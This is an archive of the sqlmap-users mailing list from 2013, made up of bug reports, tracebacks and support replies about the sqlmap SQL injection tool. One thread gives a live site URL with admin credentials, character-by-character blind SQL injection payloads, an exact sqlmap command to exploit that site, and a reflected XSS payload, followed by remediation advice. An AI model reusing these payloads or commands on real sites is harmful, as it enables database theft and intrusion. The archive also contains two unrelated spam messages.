sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] Passing SOAPAction in --header

[Brandon P. <bpe...@gm...>]

Tested and works like a charm. Thanks, you guys rock.


On Thu, May 23, 2013 at 9:21 AM, Brandon Perry <bpe...@gm...>wrote:

> Can test this evening! Thanks
>
>
> On Thu, May 23, 2013 at 3:30 AM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Hi Brandon.
>>
>> Please retry it now :-)
>>
>> Kind regards,
>> Miroslav Stampar
>> On May 23, 2013 5:57 AM, "Brandon Perry" <bpe...@gm...>
>> wrote:
>>
>>> I am trying to pass in the following for a header:
>>>
>>> SOAPAction:http://tempuri.org/AddUser
>>>
>>> I think the second colon is fudging things up but it is required for the
>>> header and request to function properly. Is there a way for me to "escape"
>>> the colon?
>>>
>>> The error I get is:
>>>
>>> invalid header value: 'SOAPAction:http://tempuri.org/AddUser'. Valid
>>> header format is 'name:value'
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Try New Relic Now & We'll Send You this Cool Shirt
>>> New Relic is the only SaaS-based application performance monitoring
>>> service
>>> that delivers powerful full stack analytics. Optimize and monitor your
>>> browser, app, & servers with just a few lines of code. Try New Relic
>>> and get this awesome Nerd Life shirt!
>>> http://p.sf.net/sfu/newrelic_d2d_may
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] Passing SOAPAction in --header

[Brandon P. <bpe...@gm...>]

Can test this evening! Thanks


On Thu, May 23, 2013 at 3:30 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi Brandon.
>
> Please retry it now :-)
>
> Kind regards,
> Miroslav Stampar
> On May 23, 2013 5:57 AM, "Brandon Perry" <bpe...@gm...>
> wrote:
>
>> I am trying to pass in the following for a header:
>>
>> SOAPAction:http://tempuri.org/AddUser
>>
>> I think the second colon is fudging things up but it is required for the
>> header and request to function properly. Is there a way for me to "escape"
>> the colon?
>>
>> The error I get is:
>>
>> invalid header value: 'SOAPAction:http://tempuri.org/AddUser'. Valid
>> header format is 'name:value'
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>>
>> ------------------------------------------------------------------------------
>> Try New Relic Now & We'll Send You this Cool Shirt
>> New Relic is the only SaaS-based application performance monitoring
>> service
>> that delivers powerful full stack analytics. Optimize and monitor your
>> browser, app, & servers with just a few lines of code. Try New Relic
>> and get this awesome Nerd Life shirt!
>> http://p.sf.net/sfu/newrelic_d2d_may
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] Blind SQL Injection question

[Chris O. <chr...@gm...>]

Hi Guy

This is indeed a valid vulnerability.

If we take the following request:

POST /trk/lpg/index.php HTTP/1.1
Host: myimg.co
Cookie: PHPSESSID=yourID

from_date=2013-05-21&to_date=2013-05-23&campaign_id=11'5*CA-PTV*Keyword*********&crap=&submit=submit&stage=2

Then we receive a response which includes the following:

You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '\'5
            AND clicks.ViewDate > '2013-05-21'
            AND clicks.View' at line 10

Notice the apostrophe included in the campaign_id.  This breaks the SQL
syntax and proves that we have error based SQL injection.  You should not
output DBMS error messages to the client, although simply disabling this
will not remove the issue, because there are other, blind, techniques that
we can use (e.g. time based etc.)  The above does prove the concept, the
issue is there.

In terms of making it work with SQLMap, the following should work:

1) Save the entire HTTP request into a file, for the purposes of this
demonstration I've saved it to a file called REQUEST in the same directory
as SQLMap.
2) Edit the file so that campaign_id is just an integer, e.g. 115
3) Use the following command:

python sqlmap.py -r REQUEST -p campaign_id --suffix
"*CA-PTV*Keyword**********" -f -b

You can replace the -f and -b with whatever it is you're trying to get at,
e.g. --dbs to list the databases available to that DBMS user.

The problem you were having probably arose from the fact that the injection
point is mid value, so you needed to provide the rest of the expected value
to create "valid" requests.

To fix this issue, you need to be using prepared statements, so for PHP
see, for example: http://php.net/manual/en/pdo.prepare.php

Finally, as an aside, you also have (reflected) Cross Site Scripting
issues.  If you insert script tags into the three primary POST values (i.e.
from_date, to_date and campaign_id) the page response doesn't encode the
output and so you can have a request such as:

from_date=2013-05-21<script>alert(123)</script>&to_date...

and the page will respond with:

<b>Date Range: </b> 2013-05-21<script>alert(123)</script> ---
2013-05-23<br>....etc.

Bearing all of the above in mind, your remediation priority should be:

1) Use prepared statements for all SQL queries in order to get rid of SQL
injection
2) Output encode all content returned to the client in a manner appropriate
for the context of that output (e.g. encoding for output that will end up
as normal HTML will differ from encoding output that appears in an existing
JS block).  This will get rid of most XSS.
3) Stop outputting DBMS error messages to the client.  It's fine to save
these to a file above the web root.

Well, that's my gratis work done for the year :)

Hope it helped.

Regards

Chris Oakley



On 23 May 2013 00:53, Guy Dufour <yam...@gm...> wrote:

> My script is installed on http://myimg.co/trk/lpg/
> login " admin ", password " hello "
>
> A security advisor told me that it's injectable while being logged in
> manually by modifying the POST param "campaign_id"
>
> Example:
> Change " 129*US-LP-PPV*PPV********* " to :
> 129 and ascii(substring((SELECT database()),1,1))>108*p*ts'*********
>
> 109
>
>
> 129 and ascii(substring((SELECT database()),2,1))>120*p*ts'*********
>
> 121
>
>
> 129 and ascii(substring((SELECT database()),3,1))>104*p*ts'*********
>
> 105
>
>
> 129 and ascii(substring((SELECT database()),4,1))>108*p*ts'*********
>
> 109
>
>
> 129 and ascii(substring((SELECT database()),5,1))>102*p*ts'*********
>
> 103
>
> 129 and ascii(substring((SELECT database()),6,1))>98*p*ts'*********
>
> 99
>
> 129 and ascii(substring((SELECT database()),7,1))>110*p*ts'*********
>
> 111
>
> 129 and ascii(substring((SELECT database()),8,1))>94*p*ts'*********
>
> 95
>
> 129 and ascii(substring((SELECT database()),9,1))>98*p*ts'*********
>
> 99
>
> 129 and ascii(substring((SELECT database()),10,1))>111*p*ts'*********
>
> 112
>
>
> 129 and ascii(substring((SELECT database()),11,1))>117*p*ts'*********
>
> 118
>
>
> This gives database name =  myimgco_cpv
>
>
> However I can't seem to be able to make this work in SQLmap..
>
> Do you guys have any idea? You can try to reproduce this on my server,
> without breaking anything please :)
>
>
> Thanks a lot!
>
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] [SQLMAP] Unhandled exception for IPv6

[Miroslav S. <mir...@gm...>]

Hi again.

I would really need to know the format of those urls inside to handle this
problem appropriately.

Kind regards,
Miroslav Stampar
On May 22, 2013 6:12 PM, "Miroslav Stampar" <mir...@gm...>
wrote:

> Hi.
>
> Can you please send the content of that list file?
>
> Kind regards,
> Miroslav Stampar
> Dana 22.5.2013. 16:07 "e.n...@st..." <
> e.n...@st...> je napisao/la:
>
>> Hi guys,
>>
>> I have pasted this exception in order to you can have a look if it is
>> possible to fix it :
>>
>>
>> [13:30:37] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2bfdac5,
>> retry your run with the latest development version from the GitHub
>> repository. If the exception persists, please send by e-mail to
>> 'sql...@li...' or open a new issue at
>> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>> text and any information required to reproduce the bug. The developers
>> will try to reproduce the bug, fix it accordingly and get back to you.
>> sqlmap version: 1.0-dev-2bfdac5
>> Python version: 2.7.3
>> Operating system: posix
>> Command line: sqlmap.py -m list2try.txt --check-tor --tor
>> --tor-type=SOCKS5 --random-agent --threads 5 --beep --batch --dbs
>> Technique: None
>> Back-end DBMS: None (identified)
>> Traceback (most recent call last):
>>   File "sqlmap.py", line 89, in main
>>     start()
>>   File "/home/sqlmap/sqlmap/lib/controller/controller.py", line 274, in
>> start
>>     parseTargetUrl()
>>   File "/home/sqlmap/sqlmap/lib/core/common.py", line 1162, in
>> parseTargetUrl
>>     if CUSTOM_INJECTION_MARK_CHAR in conf.url:
>>   File "/usr/lib/python2.7/urlparse.py", line 183, in urlsplit
>>     raise ValueError("Invalid IPv6 URL")
>> ValueError: Invalid IPv6 URL
>>
>> [*] shutting down at 13:30:37
>>
>>
>>
>> Cheers,
>> Eduardo
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Try New Relic Now & We'll Send You this Cool Shirt
>> New Relic is the only SaaS-based application performance monitoring
>> service
>> that delivers powerful full stack analytics. Optimize and monitor your
>> browser, app, & servers with just a few lines of code. Try New Relic
>> and get this awesome Nerd Life shirt!
>> http://p.sf.net/sfu/newrelic_d2d_may
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>

Re: [sqlmap-users] Passing SOAPAction in --header

[Miroslav S. <mir...@gm...>]

Hi Brandon.

Please retry it now :-)

Kind regards,
Miroslav Stampar
On May 23, 2013 5:57 AM, "Brandon Perry" <bpe...@gm...> wrote:

> I am trying to pass in the following for a header:
>
> SOAPAction:http://tempuri.org/AddUser
>
> I think the second colon is fudging things up but it is required for the
> header and request to function properly. Is there a way for me to "escape"
> the colon?
>
> The error I get is:
>
> invalid header value: 'SOAPAction:http://tempuri.org/AddUser'. Valid
> header format is 'name:value'
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] Passing SOAPAction in --header

[Brandon P. <bpe...@gm...>]

I am trying to pass in the following for a header:

SOAPAction:http://tempuri.org/AddUser

I think the second colon is fudging things up but it is required for the
header and request to function properly. Is there a way for me to "escape"
the colon?

The error I get is:

invalid header value: 'SOAPAction:http://tempuri.org/AddUser'. Valid header
format is 'name:value'

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[sqlmap-users] Blind SQL Injection question

[Guy D. <yam...@gm...>]

My script is installed on http://myimg.co/trk/lpg/
login " admin ", password " hello "

A security advisor told me that it's injectable while being logged in
manually by modifying the POST param "campaign_id"

Example:
Change " 129*US-LP-PPV*PPV********* " to :
129 and ascii(substring((SELECT database()),1,1))>108*p*ts'*********

109


129 and ascii(substring((SELECT database()),2,1))>120*p*ts'*********

121


129 and ascii(substring((SELECT database()),3,1))>104*p*ts'*********

105


129 and ascii(substring((SELECT database()),4,1))>108*p*ts'*********

109


129 and ascii(substring((SELECT database()),5,1))>102*p*ts'*********

103

129 and ascii(substring((SELECT database()),6,1))>98*p*ts'*********

99

129 and ascii(substring((SELECT database()),7,1))>110*p*ts'*********

111

129 and ascii(substring((SELECT database()),8,1))>94*p*ts'*********

95

129 and ascii(substring((SELECT database()),9,1))>98*p*ts'*********

99

129 and ascii(substring((SELECT database()),10,1))>111*p*ts'*********

112


129 and ascii(substring((SELECT database()),11,1))>117*p*ts'*********

118


This gives database name =  myimgco_cpv


However I can't seem to be able to make this work in SQLmap..

Do you guys have any idea? You can try to reproduce this on my server,
without breaking anything please :)


Thanks a lot!

Re: [sqlmap-users] unhandled exception

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report. It should be (hopefully) fixed now.

Kind regards,
Miroslav Stampar
On May 22, 2013 12:48 PM, "kvasilopoulos" <kyp...@at...> wrote:

> [02:43:03] [CRITICAL] unhandled exception in sqlmap/1.0-dev-4b2cf07, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-4b2cf07
> Python version: 2.7.1
> Operating system: posix
> Command line: ./sqlmap.py -u *******************************************
> --data="data_replaced" -v 2 --search pass -D
> ***************************************** -p vulnerable_parameter --level 5
> --risk 3 --dbms mssql
> Technique: ERROR
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 89, in main
>     start()
>   File "/Users/xxx/sqlmap-dev1/lib/controller/controller.py", line 576, in
> start
>     action()
>   File "/Users/xxx/sqlmap-dev1/lib/controller/action.py", line 133, in
> action
>     conf.dbmsHandler.search()
>   File "/Users/xxx/sqlmap-dev1/plugins/generic/search.py", line 598, in
> search
>     self.searchDb()
>   File "/Users/xxx/sqlmap-dev1/plugins/generic/search.py", line 88, in
> searchDb
>     query = query % (dbQuery + exclDbsQuery)
> TypeError: not all arguments converted during string formatting
>
>
> Regards
> Kyprianos Vasilopoulos
>
>
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] [SQLMAP] Unhandled exception for IPv6

[Miroslav S. <mir...@gm...>]

Hi.

Can you please send the content of that list file?

Kind regards,
Miroslav Stampar
Dana 22.5.2013. 16:07 "e.n...@st..." <
e.n...@st...> je napisao/la:

> Hi guys,
>
> I have pasted this exception in order to you can have a look if it is
> possible to fix it :
>
>
> [13:30:37] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2bfdac5,
> retry your run with the latest development version from the GitHub
> repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers
> will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-2bfdac5
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -m list2try.txt --check-tor --tor
> --tor-type=SOCKS5 --random-agent --threads 5 --beep --batch --dbs
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 89, in main
>     start()
>   File "/home/sqlmap/sqlmap/lib/controller/controller.py", line 274, in
> start
>     parseTargetUrl()
>   File "/home/sqlmap/sqlmap/lib/core/common.py", line 1162, in
> parseTargetUrl
>     if CUSTOM_INJECTION_MARK_CHAR in conf.url:
>   File "/usr/lib/python2.7/urlparse.py", line 183, in urlsplit
>     raise ValueError("Invalid IPv6 URL")
> ValueError: Invalid IPv6 URL
>
> [*] shutting down at 13:30:37
>
>
>
> Cheers,
> Eduardo
>
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

[sqlmap-users] [SQLMAP] Unhandled exception for IPv6

[<e.n...@st...>]

Hi guys,

I have pasted this exception in order to you can have a look if it is
possible to fix it :


[13:30:37] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2bfdac5,
retry your run with the latest development version from the GitHub
repository. If the exception persists, please send by e-mail to
'sql...@li...' or open a new issue at
'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
text and any information required to reproduce the bug. The developers
will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-2bfdac5
Python version: 2.7.3
Operating system: posix
Command line: sqlmap.py -m list2try.txt --check-tor --tor
--tor-type=SOCKS5 --random-agent --threads 5 --beep --batch --dbs
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "sqlmap.py", line 89, in main
    start()
  File "/home/sqlmap/sqlmap/lib/controller/controller.py", line 274, in
start
    parseTargetUrl()
  File "/home/sqlmap/sqlmap/lib/core/common.py", line 1162, in
parseTargetUrl
    if CUSTOM_INJECTION_MARK_CHAR in conf.url:
  File "/usr/lib/python2.7/urlparse.py", line 183, in urlsplit
    raise ValueError("Invalid IPv6 URL")
ValueError: Invalid IPv6 URL

[*] shutting down at 13:30:37



Cheers,
Eduardo

[sqlmap-users] unhandled exception

[kvasilopoulos <kyp...@at...>]

[02:43:03] [CRITICAL] unhandled exception in sqlmap/1.0-dev-4b2cf07, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-4b2cf07
Python version: 2.7.1
Operating system: posix
Command line: ./sqlmap.py -u ******************************************* --data="data_replaced" -v 2 --search pass -D ***************************************** -p vulnerable_parameter --level 5 --risk 3 --dbms mssql
Technique: ERROR
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 89, in main
    start()
  File "/Users/xxx/sqlmap-dev1/lib/controller/controller.py", line 576, in start
    action()
  File "/Users/xxx/sqlmap-dev1/lib/controller/action.py", line 133, in action
    conf.dbmsHandler.search()
  File "/Users/xxx/sqlmap-dev1/plugins/generic/search.py", line 598, in search
    self.searchDb()
  File "/Users/xxx/sqlmap-dev1/plugins/generic/search.py", line 88, in searchDb
    query = query % (dbQuery + exclDbsQuery)
TypeError: not all arguments converted during string formatting


Regards
Kyprianos Vasilopoulos

Re: [sqlmap-users] Not getting any sensitive data from database

[Miroslav S. <mir...@gm...>]

Hi Marcell.

There is no such capability (and IMO it would be ugly to put a
--banner-md5:), although it makes sense what you are trying to do).

Nevertheless, you can go to xml/queries.xml and change (line 23):

<banner query="VERSION()"/>
to
<banner query="MD5(VERSION())"/>

Kind regards,
Miroslav Stampar


On Sat, May 18, 2013 at 7:36 AM, Marcell Fodor <fod...@gm...>wrote:

> Heya,
>
> Is it possible to get the version as md5 hash? I mean a simple
> md5(@@version). The whole point it not pulling any sensitive data from
> database. The question comes up when database owner only wants confirmation
> of found injection point by md5 hash.
>
> like --banner-md5
>
>
> M
>
>
>
>
> ------------------------------------------------------------------------------
> AlienVault Unified Security Management (USM) platform delivers complete
> security visibility with the essential security capabilities. Easily and
> efficiently configure, manage, and operate all of your security controls
> from a single console and one unified framework. Download a free trial.
> http://p.sf.net/sfu/alienvault_d2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Not getting any sensitive data from database

[Marcell F. <fod...@gm...>]

Heya,

Is it possible to get the version as md5 hash? I mean a simple
md5(@@version). The whole point it not pulling any sensitive data from
database. The question comes up when database owner only wants confirmation
of found injection point by md5 hash.

like --banner-md5


M

[sqlmap-users] ★ Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...

[Badoo <nor...@ba...>]

Cosa aspetti a leggere subito il messaggio? Il nostro sistema ti permette di rispondere immediatamente. Scopri cosa c'è scritto...
http://eu1.badoo.com/085787061/in/yfjDKRC4zRg/?lang_id=8&g=57&m=29&mid=5194cdba000000000008000001a53aba0155577f000e

Altre persone in attesa:


Se i link contenuti in questo messaggio non dovessero funzionare, prova a copiarli e a incollarli nella barra degli indirizzi del browser.


Buon divertimento!
Il team di Badoo

Questa e-mail ti è stata inviata da Badoo Trading Limited (indirizzo postale in fondo).
http://eu1.badoo.com/impersonation.phtml?lang_id=8&email=sqlmap-users%40lists.sourceforge.net&block_code=1d6342&m=29&mid=5194cdba000000000008000001a53aba0155577f000e

Badoo Trading Limited è una società a responsabilità limitata registrata in Inghilterra e Galles con il numero d'impresa 7540255 con sede legale all'indirizzo Media Village, 131 - 151 Great Titchfield Street, London, W1W 5BB.

Re: [sqlmap-users] Direct access to mysql database

[Miroslav S. <mir...@gm...>]

Hi Marcell.

We can't include all those dependencies as it would make sqlmap package
even bigger than it's now. Also, direct connection feature is an "optional"
one.

There could be (privilege?) complications with a PyMySQL setup.

While you are not able to do the following command, you won't be able to
properly run "-d" against MySQL:

python -c "import pymysql"

Optionally, you can try to run:
python-sqlalchemy

and rerun the -d... SQLAlchemy is an optional way how sqlmap handles direct
connections.

Kind regards,
Miroslav Stampar


On Sun, May 12, 2013 at 9:53 AM, Marcell Fodor <fod...@gm...>wrote:

> Heya,
>
> I needed direct access to mysql server and got error:
> [03:24:45] [CRITICAL] sqlmap requires 'python pymysql' third-party library
> in order to directly connect to the database MySQL. Download from '
> https://github.com/petehunt/PyMySQL/'
>
> Now I got "This repository is temporarily unavailable." error and also
> tried to install like in this tutorial copy/pasted from web:
>
> Direct connection to the database
> --------------------------------------------------
>
> Installing Py-MySQL Dependency
>
>   git clone https://github.com/petehunt/PyMySQL/
>   cd PyMySQL
>   python setup.py install
>   cd ..
>   rm -rf PyMySQL
>
> ./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10
>
> First line fails.
>
>
> Would be great if this library was included in default install.
>
> Thanks in advance,
>
> Marcell
>
>
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and
> their applications. This 200-page book is written by three acclaimed
> leaders in the field. The early access version is available now.
> Download your free book today! http://p.sf.net/sfu/neotech_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Direct access to mysql database

[Marcell F. <fod...@gm...>]

Heya,

I needed direct access to mysql server and got error:
[03:24:45] [CRITICAL] sqlmap requires 'python pymysql' third-party library
in order to directly connect to the database MySQL. Download from '
https://github.com/petehunt/PyMySQL/'

Now I got "This repository is temporarily unavailable." error and also
tried to install like in this tutorial copy/pasted from web:

Direct connection to the database
--------------------------------------------------

Installing Py-MySQL Dependency

  git clone https://github.com/petehunt/PyMySQL/
  cd PyMySQL
  python setup.py install
  cd ..
  rm -rf PyMySQL

./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10

First line fails.


Would be great if this library was included in default install.

Thanks in advance,

Marcell

[sqlmap-users] gunawanmardian@gmail.com wants to follow you. Accept?

[<gun...@gm...>]

Hi,

gun...@gm... wants to follow you.

****** Is gun...@gm... you friend? ******
If Yes please follow the link below:
http://invites.infoaxe.net/signup_e.html?fullname=Sqlmap-users&email=sql...@li...&invitername=gun...@gm...&inviterid=16255656&userid=0&token=0&emailmasterid=a8274bc5-7e0f-41ae-9d15-b893d84c7752&from=gun...@gm...&uie=0&src=txt_yes

If No please follow the link below:
http://invites.infoaxe.net/signup_e_no.html?fullname=Sqlmap-users&email=sql...@li...&invitername=gun...@gm...&inviterid=16255656&userid=0&token=0&emailmasterid=a8274bc5-7e0f-41ae-9d15-b893d84c7752&from=gun...@gm...&uie=0&src=txt_no


Follow the link below to remove yourself from all such emails
http://invites.infoaxe.net/uns.jsp?email=sql...@li...&iid=a8274bc5-7e0f-41ae-9d15-b893d84c7752&from=gun...@gm...&src=txt

Re: [sqlmap-users] BUG...!!!! o.O

[Miroslav S. <mir...@gm...>]

Hi.

It should be "patched" now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/447


On Tue, May 7, 2013 at 9:32 AM, Isai Ofir Juarez Contreras <
ing...@gm...> wrote:

> [02:30:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev-427d88b, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-427d88b
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u **************************************
> --data=action=AnswerForm&id_form=1 -D * --dump-all --threads=10
> Technique: BOOL*AN
> Back-end DBMS: Oracle (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap", line 89, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 575, in start
>     action()
>   File "/usr/share/sqlmap/lib/controller/action.py", line 130, in action
>     conf.dbmsHandler.dumpAll()
>   File "/usr/share/sqlmap/plugins/generic/entries.py", line 335, in dumpAll
>     self.dumpTable()
>   File "/usr/share/sqlmap/plugins/generic/entries.py", line 83, in
> dumpTable
>     self.getTables()
>   File "/usr/share/sqlmap/plugins/generic/databases.py", line 336, in
> getTables
>     table = unArrayizeValue(inject.getValue(query, union=False,
> error=False))
>   File "/usr/share/sqlmap/lib/request/inject.py", line 383, in getValue
>     value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType,
> firstChar, lastChar, dump)
>   File "/usr/share/sqlmap/lib/request/inject.py", line 278, in
> _goInferenceProxy
>     outputs = _goInferenceFields(expression, expressionFields,
> expressionFieldsList, payload, charsetType=charsetType,
> firstChar=firstChar, lastChar=lastChar, dump=dump)
>   File "/usr/share/sqlmap/lib/request/inject.py", line 126, in
> _goInferenceFields
>     output = _goInference(payload, expressionReplaced, charsetType,
> firstChar, lastChar, dump, field)
>   File "/usr/share/sqlmap/lib/request/inject.py", line 98, in _goInference
>     count, value = bisection(payload, expression, length, charsetType,
> firstChar, lastChar, dump)
>   File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line 134, in
> bisection
>     length = min(length, lastChar or length) - firstChar
> TypeError: unsupported operand type(s) for -: 'unicode' and 'int'
>
>
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and
> their applications. This 200-page book is written by three acclaimed
> leaders in the field. The early access version is available now.
> Download your free book today! http://p.sf.net/sfu/neotech_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] BUG...!!!! o.O

[Isai O. J. C. <ing...@gm...>]

[02:30:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev-427d88b, retry
your run with the latest development version from the GitHub repository. If
the exception persists, please send by e-mail to '
sql...@li...' or open a new issue at '
https://github.com/sqlmapproject/sqlmap/issues/new' with the following text
and any information required to reproduce the bug. The developers will try
to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-427d88b
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u **************************************
--data=action=AnswerForm&id_form=1 -D * --dump-all --threads=10
Technique: BOOL*AN
Back-end DBMS: Oracle (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap", line 89, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 575, in start
    action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 130, in action
    conf.dbmsHandler.dumpAll()
  File "/usr/share/sqlmap/plugins/generic/entries.py", line 335, in dumpAll
    self.dumpTable()
  File "/usr/share/sqlmap/plugins/generic/entries.py", line 83, in dumpTable
    self.getTables()
  File "/usr/share/sqlmap/plugins/generic/databases.py", line 336, in
getTables
    table = unArrayizeValue(inject.getValue(query, union=False,
error=False))
  File "/usr/share/sqlmap/lib/request/inject.py", line 383, in getValue
    value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType,
firstChar, lastChar, dump)
  File "/usr/share/sqlmap/lib/request/inject.py", line 278, in
_goInferenceProxy
    outputs = _goInferenceFields(expression, expressionFields,
expressionFieldsList, payload, charsetType=charsetType,
firstChar=firstChar, lastChar=lastChar, dump=dump)
  File "/usr/share/sqlmap/lib/request/inject.py", line 126, in
_goInferenceFields
    output = _goInference(payload, expressionReplaced, charsetType,
firstChar, lastChar, dump, field)
  File "/usr/share/sqlmap/lib/request/inject.py", line 98, in _goInference
    count, value = bisection(payload, expression, length, charsetType,
firstChar, lastChar, dump)
  File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line 134, in
bisection
    length = min(length, lastChar or length) - firstChar
TypeError: unsupported operand type(s) for -: 'unicode' and 'int'

Re: [sqlmap-users] --ignore-404 ?

[Miroslav S. <mir...@gm...>]

Hi Buawig.

Currently, sqlmap should not stop in testing mode (it's discutable what to
do in enumeration phase - currently we abrupt program run in such case) on
any occurrence of non-200 code.

Could you please be more specific here? Maybe there is somewhere a hidden
bug related.

Kind regards,
Miroslav Stampar


On Wed, Apr 24, 2013 at 8:40 PM, buawig <bu...@gm...> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> Hi,
>
> a custom web application responds to different URL parameter payloads
> with changing HTTP status codes:
>
>
> example.com/foo.bar?param=payload1
> response: 200
>
> example.com/foo.bar?param=payload2
> response: 403
>
> example.com/foo.bar?param=payload3
> response: 400
>
> example.com/foo.bar?param=payload4
